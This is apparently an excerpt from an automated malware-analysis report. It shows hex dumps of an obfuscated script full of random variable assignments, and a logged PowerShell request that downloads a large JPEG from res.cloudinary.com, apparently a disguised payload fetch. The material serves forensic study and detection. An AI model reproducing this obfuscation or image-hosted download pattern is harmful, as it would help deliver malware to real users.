                                                                                                            2024-12-03 09:04:58 UTC1291INData Raw: 31 66 37 66 0d 0a 50 6b 57 6f 7a 50 65 57 65 6e 63 4e 4a 70 62 20 3d 20 22 6b 63 4b 67 63 78 69 6f 64 57 66 4c 57 50 69 22 0d 0a 69 55 62 6d 57 61 70 4e 55 41 4e 69 4c 41 64 20 3d 20 22 6d 5a 6b 52 70 74 57 57 57 4b 69 47 49 68 6e 22 0d 0a 70 73 43 65 57 4c 68 51 6f 5a 74 62 66 72 57 20 3d 20 22 4f 5a 4b 64 57 68 50 4c 6a 57 6b 4f 4b 62 61 22 0d 0a 50 48 4c 51 69 6b 4c 65 48 43 6d 6e 4b 6c 66 20 3d 20 22 50 4c 76 57 7a 57 76 69 4c 67 6b 69 4b 70 4c 22 0d 0a 4c 47 69 6c 47 57 47 50 4f 69 6f 67 4c 42 4e 20 3d 20 22 55 41 61 57 68 65 4c 68 57 4c 6c 50 71 42 7a 22 0d 0a 48 57 69 68 64 4b 75 4b 6e 78 55 47 64 6d 47 20 3d 20 22 65 66 4e 62 57 4c 50 61 49 41 4c 41 6a 66 41 22 0d 0a 53 4b 4e 6f 4c 6d 4c 78 4c 65 57 6b 6e 4b 6c 20 3d 20 22 4b 47 54 75 6d 4c 6e 47
                                                                                                            Data Ascii: 1f7fPkWozPeWencNJpb = "kcKgcxiodWfLWPi"iUbmWapNUANiLAd = "mZkRptWWWKiGIhn"psCeWLhQoZtbfrW = "OZKdWhPLjWkOKba"PHLQikLeHCmnKlf = "PLvWzWviLgkiKpL"LGilGWGPOiogLBN = "UAaWheLhWLlPqBz"HWihdKuKnxUGdmG = "efNbWLPaIALAjfA"SKNoLmLxLeWknKl = "KGTumLnG
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 4f 72 54 6f 75 4c 6b 41 72 65 4c 47 6f 22 0d 0a 4e 4c 4a 5a 61 62 57 63 4c 4c 47 5a 41 4c 4c 20 3d 20 22 41 54 4b 4c 7a 6f 52 6d 6c 5a 69 70 43 50 57 22 0d 0a 71 47 57 61 41 62 48 47 69 61 55 50 68 4c 74 20 3d 20 22 76 52 4c 66 68 63 69 57 4f 4c 57 74 7a 68 63 22 0d 0a 4c 53 76 65 70 57 63 54 70 70 6c 42 75 4c 4e 20 3d 20 22 74 55 78 72 47 57 61 6b 41 4c 71 6f 78 6e 55 22 0d 0a 6e 68 57 48 74 71 68 6a 67 4b 4c 52 62 6b 69 20 3d 20 22 6a 41 4c 57 4c 4c 66 50 65 6d 4c 4e 6f 6d 70 22 0d 0a 51 57 47 4a 50 50 55 55 57 49 5a 69 52 4f 78 20 3d 20 22 65 64 7a 48 4b 6c 69 6b 64 63 69 6f 4c 65 4b 22 0d 0a 50 5a 43 4b 61 43 47 6c 6f 71 53 4c 63 6f 7a 20 3d 20 22 6f 61 5a 4c 48 5a 48 42 71 69 76 61 66 72 74 22 0d 0a 70 75 63 4c 57 4c 42 42 4e 50 6d 7a 6f 64 5a 20 3d
                                                                                                            Data Ascii: OrTouLkAreLGo"NLJZabWcLLGZALL = "ATKLzoRmlZipCPW"qGWaAbHGiaUPhLt = "vRLfhciWOLWtzhc"LSvepWcTpplBuLN = "tUxrGWakALqoxnU"nhWHtqhjgKLRbki = "jALWLLfPemLNomp"QWGJPPUUWIZiROx = "edzHKlikdcioLeK"PZCKaCGloqSLcoz = "oaZLHZHBqivafrt"pucLWLBBNPmzodZ =
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 20 3d 20 22 65 52 57 6b 4c 4b 66 5a 67 6f 52 6e 66 6f 48 22 0d 0a 78 6b 69 4f 50 4a 4f 69 57 72 50 65 63 6b 68 20 3d 20 22 4c 41 4b 6a 55 78 73 76 72 7a 52 69 71 55 49 22 0d 0a 55 57 52 4c 69 4c 6f 65 6f 4c 75 63 4c 4c 4c 20 3d 20 22 6f 70 57 78 75 75 70 63 75 4c 4b 4e 47 57 48 22 0d 0a 71 6d 4c 42 52 4c 49 5a 57 68 6f 54 4e 4b 69 20 3d 20 22 6e 7a 41 55 65 65 50 69 6f 4b 4b 4b 69 69 4c 22 0d 0a 53 65 57 4b 63 4e 53 62 51 74 47 6a 5a 4f 69 20 3d 20 22 78 57 6e 57 6e 4c 72 6d 6e 52 72 65 57 78 68 22 0d 0a 66 74 4c 41 69 4b 50 42 4c 57 75 4c 74 61 4b 20 3d 20 22 4b 6e 4c 4c 47 70 51 6f 68 4c 43 73 74 69 4f 22 0d 0a 41 63 52 6e 6c 4c 4b 64 4e 67 68 6e 57 66 55 20 3d 20 22 49 53 47 57 68 6b 6c 64 71 57 50 55 4f 4c 64 22 0d 0a 41 66 43 4c 75 71 70 63 52 4b 62
                                                                                                            Data Ascii: = "eRWkLKfZgoRnfoH"xkiOPJOiWrPeckh = "LAKjUxsvrzRiqUI"UWRLiLoeoLucLLL = "opWxuupcuLKNGWH"qmLBRLIZWhoTNKi = "nzAUeePioKKKiiL"SeWKcNSbQtGjZOi = "xWnWnLrmnRreWxh"ftLAiKPBLWuLtaK = "KnLLGpQohLCstiO"AcRnlLKdNghnWfU = "ISGWhkldqWPUOLd"AfCLuqpcRKb
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 41 64 6d 70 55 57 20 3d 20 22 41 43 6b 41 68 5a 74 4c 68 68 4e 69 61 74 6e 22 0d 0a 69 74 57 55 4c 6e 4b 70 47 48 62 5a 63 43 5a 20 3d 20 22 6b 4c 57 66 4a 4c 6d 78 64 69 69 6d 4b 78 62 22 0d 0a 0d 0a 47 57 64 6c 69 50 68 6e 4b 55 69 6f 57 71 75 20 3d 20 22 4f 6e 6e 4a 4b 66 72 50 76 48 4c 43 47 75 74 22 0d 0a 61 5a 70 5a 63 55 72 49 4e 6e 74 5a 66 6b 6c 20 3d 20 22 75 68 6d 63 55 4b 5a 42 4b 52 7a 6f 4c 66 69 22 0d 0a 6d 4c 62 69 4c 63 4b 64 57 4e 4c 4c 65 69 6c 20 3d 20 22 57 6b 6f 50 4b 4e 57 4a 57 70 70 4c 78 4b 63 22 0d 0a 63 61 52 55 47 5a 6a 52 4c 57 6d 66 69 6e 4f 20 3d 20 22 69 4c 7a 73 63 6d 5a 6d 55 61 47 73 4e 4b 4c 22 0d 0a 55 41 62 75 4f 55 70 4a 73 64 50 6b 6b 66 6d 20 3d 20 22 50 66 4b 6f 5a 6e 4c 57 78 50 4e 6f 78 4b 4c 22 0d 0a 42 6b 47
                                                                                                            Data Ascii: AdmpUW = "ACkAhZtLhhNiatn"itWULnKpGHbZcCZ = "kLWfJLmxdiimKxb"GWdliPhnKUioWqu = "OnnJKfrPvHLCGut"aZpZcUrINntZfkl = "uhmcUKZBKRzoLfi"mLbiLcKdWNLLeil = "WkoPKNWJWppLxKc"caRUGZjRLWmfinO = "iLzscmZmUaGsNKL"UAbuOUpJsdPkkfm = "PfKoZnLWxPNoxKL"BkG
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 5a 4c 55 47 57 69 47 42 4c 6b 57 43 66 5a 20 3d 20 22 6c 6b 52 70 55 75 4f 61 6f 6e 57 4b 4b 6f 62 22 0d 0a 71 53 61 78 42 52 47 6f 55 43 6c 4b 7a 57 4b 20 3d 20 22 71 71 5a 63 42 6b 42 4f 4c 4c 6b 47 74 4f 69 22 0d 0a 4b 6d 62 4c 57 47 63 57 4c 57 4c 4e 55 6b 78 20 3d 20 22 4a 55 70 4a 66 62 66 4e 42 70 53 4c 57 76 65 22 0d 0a 4c 57 51 78 57 75 4c 4c 78 7a 66 5a 4b 4c 63 20 3d 20 22 6f 71 69 51 6e 4c 76 57 4c 78 71 66 4f 65 43 22 0d 0a 50 52 55 4c 63 62 6c 47 43 4e 4c 42 73 63 55 20 3d 20 22 66 50 4c 78 50 55 4e 65 4b 47 4e 53 74 5a 57 22 0d 0a 0d 0a 42 6b 57 71 65 70 47 6f 6c 48 74 41 6f 4e 54 20 3d 20 22 73 70 71 55 63 72 55 64 57 78 66 48 52 65 6f 22 0d 0a 63 52 4b 4c 7a 4b 57 64 57 63 69 55 4c 75 47 20 3d 20 22 4b 4c 55 71 4b 6b 47 47 75 65 41 69 4c
                                                                                                            Data Ascii: ZLUGWiGBLkWCfZ = "lkRpUuOaonWKKob"qSaxBRGoUClKzWK = "qqZcBkBOLLkGtOi"KmbLWGcWLWLNUkx = "JUpJfbfNBpSLWve"LWQxWuLLxzfZKLc = "oqiQnLvWLxqfOeC"PRULcblGCNLBscU = "fPLxPUNeKGNStZW"BkWqepGolHtAoNT = "spqUcrUdWxfHReo"cRKLzKWdWciULuG = "KLUqKkGGueAiL
                                                                                                            2024-12-03 09:04:58 UTC1304INData Raw: 57 55 62 63 22 0d 0a 4c 47 68 62 66 61 57 74 69 57 41 4c 78 6b 57 20 3d 20 22 43 6b 57 4b 68 6f 47 4f 6c 62 47 6f 61 78 57 22 0d 0a 70 6f 4c 62 69 57 6c 6d 7a 65 4b 4e 75 4b 75 20 3d 20 22 66 61 4b 6b 6f 74 5a 69 57 74 6b 4f 57 69 6d 22 0d 0a 41 4c 66 69 6c 6b 55 69 72 50 47 4b 4f 4f 6b 20 3d 20 22 67 67 55 71 4b 55 4b 66 41 63 6b 57 4c 7a 65 22 0d 0a 57 74 57 64 6e 69 4a 4b 6e 65 57 78 47 41 5a 20 3d 20 22 4c 4f 7a 57 47 4e 4a 55 6c 63 63 72 6b 70 4c 22 0d 0a 6c 66 63 6c 74 48 4c 50 50 66 69 69 78 6b 52 20 3d 20 22 55 49 70 43 6b 57 4c 6c 50 4c 6e 4b 6c 74 6d 22 0d 0a 41 6f 78 66 42 57 57 5a 55 4f 57 72 6d 5a 69 20 3d 20 22 69 6f 74 63 6e 42 70 6e 6c 69 4b 6d 47 69 4e 22 0d 0a 4c 57 78 68 74 73 71 66 6a 69 4c 7a 7a 4f 7a 20 3d 20 22 52 6d 57 4f 6f 53 4f
                                                                                                            Data Ascii: WUbc"LGhbfaWtiWALxkW = "CkWKhoGOlbGoaxW"poLbiWlmzeKNuKu = "faKkotZiWtkOWim"ALfilkUirPGKOOk = "ggUqKUKfAckWLze"WtWdniJKneWxGAZ = "LOzWGNJUlccrkpL"lfcltHLPPfiixkR = "UIpCkWLlPLnKltm"AoxfBWWZUOWrmZi = "iotcnBpnliKmGiN"LWxhtsqfjiLzzOz = "RmWOoSO
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 32 30 30 30 0d 0a 76 6c 68 22 0d 0a 61 57 4a 74 78 6d 53 62 57 64 6c 57 5a 6c 6c 20 3d 20 22 4c 6c 5a 6b 73 68 64 71 47 7a 57 61 76 63 6b 22 0d 0a 68 69 69 52 7a 55 62 57 7a 55 70 43 6a 6d 64 20 3d 20 22 4c 4e 4c 6c 63 55 4b 4c 4e 66 66 47 62 73 4b 22 0d 0a 55 6d 65 42 7a 70 57 74 62 4c 69 6d 70 73 68 20 3d 20 22 4f 57 4e 57 50 55 6c 64 4c 6c 72 42 7a 75 66 22 0d 0a 0d 0a 50 57 6d 6d 4e 63 4f 41 52 4c 6b 57 4c 41 63 20 3d 20 22 4c 57 5a 50 71 73 55 66 57 57 74 53 74 68 57 22 0d 0a 4c 65 57 6f 6f 41 62 57 43 5a 65 68 66 57 73 20 3d 20 22 69 66 7a 57 78 6c 69 62 68 5a 4c 4c 53 6c 61 22 0d 0a 69 4e 6b 4a 65 66 4b 7a 66 69 57 66 43 78 70 20 3d 20 22 72 7a 71 63 6f 55 6c 57 4e 5a 69 47 47 47 42 22 0d 0a 65 4e 6b 41 55 6b 6e 68 64 55 7a 71 4c 74 43 20 3d 20 22
                                                                                                            Data Ascii: 2000vlh"aWJtxmSbWdlWZll = "LlZkshdqGzWavck"hiiRzUbWzUpCjmd = "LNLlcUKLNffGbsK"UmeBzpWtbLimpsh = "OWNWPUldLlrBzuf"PWmmNcOARLkWLAc = "LWZPqsUfWWtSthW"LeWooAbWCZehfWs = "ifzWxlibhZLLSla"iNkJefKzfiWfCxp = "rzqcoUlWNZiGGGB"eNkAUknhdUzqLtC = "
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 20 22 57 6b 47 47 4b 72 53 70 66 57 42 6b 42 63 65 22 0d 0a 6c 48 69 4b 63 62 6e 57 6d 70 57 63 63 41 5a 20 3d 20 22 4f 4b 47 4c 75 6f 74 75 4e 4b 6f 43 57 66 4b 22 0d 0a 63 62 4f 68 71 51 6f 6b 69 63 4c 54 63 6d 6c 20 3d 20 22 63 6b 71 4c 55 62 5a 66 62 57 74 54 4f 4c 47 22 0d 0a 4b 4c 57 52 54 69 43 69 6b 47 4b 6b 6c 55 7a 20 3d 20 22 63 57 6d 64 66 6b 4c 4c 5a 50 65 57 65 42 47 22 0d 0a 57 4c 6f 63 52 50 57 4c 4c 55 4e 4b 55 43 47 20 3d 20 22 5a 6b 73 4c 51 57 47 5a 64 42 78 61 70 43 68 22 0d 0a 54 66 4c 57 4c 54 63 64 63 4e 55 55 57 69 4f 20 3d 20 22 55 4b 6b 41 64 6a 68 6d 70 72 70 4b 66 4f 63 22 0d 0a 42 50 41 64 47 63 4c 6d 4b 4e 52 62 50 57 65 20 3d 20 22 57 4b 6c 4e 57 47 6b 6f 4f 6f 47 50 47 6e 64 22 0d 0a 0d 0a 4c 4b 6b 53 6e 4c 65 69 4b 55 78
                                                                                                            Data Ascii: "WkGGKrSpfWBkBce"lHiKcbnWmpWccAZ = "OKGLuotuNKoCWfK"cbOhqQokicLTcml = "ckqLUbZfbWtTOLG"KLWRTiCikGKklUz = "cWmdfkLLZPeWeBG"WLocRPWLLUNKUCG = "ZksLQWGZdBxapCh"TfLWLTcdcNUUWiO = "UKkAdjhmprpKfOc"BPAdGcLmKNRbPWe = "WKlNWGkoOoGPGnd"LKkSnLeiKUx
                                                                                                            2024-12-03 09:04:58 UTC1369INData Raw: 74 61 51 71 55 54 20 3d 20 22 4b 63 70 55 5a 4c 6c 57 63 68 55 57 57 4e 50 22 0d 0a 6b 75 69 6a 6c 52 4c 6b 4e 68 68 47 6f 41 68 20 3d 20 22 69 6b 75 66 78 4b 78 65 48 6b 4c 47 75 6b 47 22 0d 0a 64 57 4b 6c 4c 6a 72 63 57 64 4a 4c 4c 52 4b 20 3d 20 22 66 6d 71 78 6e 67 4e 62 50 50 43 69 66 4b 74 22 0d 0a 4c 72 71 6e 6c 66 72 53 55 48 6f 6a 4c 57 71 20 3d 20 22 6e 4c 67 70 6d 72 57 69 55 4b 57 42 4f 68 6c 22 0d 0a 70 5a 63 41 4c 6e 7a 52 70 50 68 78 55 4c 7a 20 3d 20 22 42 41 62 62 7a 4b 6b 6d 55 69 41 43 7a 43 53 22 0d 0a 41 6e 57 65 68 55 4b 4c 6b 71 43 55 43 4e 64 20 3d 20 22 6c 49 75 68 6d 5a 70 4b 63 68 6b 6b 43 55 6f 22 0d 0a 70 4f 7a 47 4a 55 4b 4c 41 6d 72 47 69 4c 57 20 3d 20 22 66 62 4b 6d 65 65 52 55 49 63 6d 6b 78 4e 6b 22 0d 0a 4b 63 6b 5a 4b
                                                                                                            Data Ascii: taQqUT = "KcpUZLlWchUWWNP"kuijlRLkNhhGoAh = "ikufxKxeHkLGukG"dWKlLjrcWdJLLRK = "fmqxngNbPPCifKt"LrqnlfrSUHojLWq = "nLgpmrWiUKWBOhl"pZcALnzRpPhxULz = "BAbbzKkmUiACzCS"AnWehUKLkqCUCNd = "lIuhmZpKchkkCUo"pOzGJUKLAmrGiLW = "fbKmeeRUIcmkxNk"KckZK


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.449731151.101.1.1374437616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-03 09:05:04 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                            Host: res.cloudinary.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-12-03 09:05:04 UTC805INHTTP/1.1 200 OK
                                                                                                            Connection: close
                                                                                                            Content-Length: 2230233
                                                                                                            Content-Type: image/jpeg
                                                                                                            Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                            Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                            Date: Tue, 03 Dec 2024 09:05:04 GMT
                                                                                                            Strict-Transport-Security: max-age=604800
                                                                                                            Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                            Server-Timing: cld-fastly;dur=285;cpu=123;start=2024-12-03T09:05:04.523Z;desc=miss,rtt;dur=185,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=152;start=2024-12-03T09:05:04.650Z
                                                                                                            Server: Cloudinary
                                                                                                            Timing-Allow-Origin: *
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Accept-Ranges: bytes
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                            x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                            Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                            Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                            Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                            Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                            Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                            Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                            Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
